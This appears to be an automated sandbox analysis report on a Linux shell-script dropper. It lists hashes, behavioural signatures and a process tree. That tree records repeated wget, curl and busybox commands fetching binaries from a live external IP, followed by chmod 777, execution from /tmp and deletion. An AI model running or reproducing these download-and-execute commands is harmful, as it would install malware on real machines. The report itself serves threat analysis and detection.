Analysis
-
max time kernel
72s -
max time network
74s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
-
Size
10KB
-
MD5
bd77f6652549a8b0545e6296982a1ac8
-
SHA1
1b2fba63b17d3b1b6408006f4fd88c0774f434ce
-
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
-
SHA512
7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
-
SSDEEP
96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
916 wget
918 busybox
892 wget
893 curl
894 busybox
897 rm
896 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
917 curl
920 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
921 rm
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:739
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:750
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:756
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:767
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:808
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:819
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:831
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:850
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:867
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:873
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:879
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:888
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:896
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:900
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:906
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:912
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:920
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:924
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:930
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:936
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:942
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:948
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:954
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:960
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:966
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:972
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:978
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:984
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:987
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97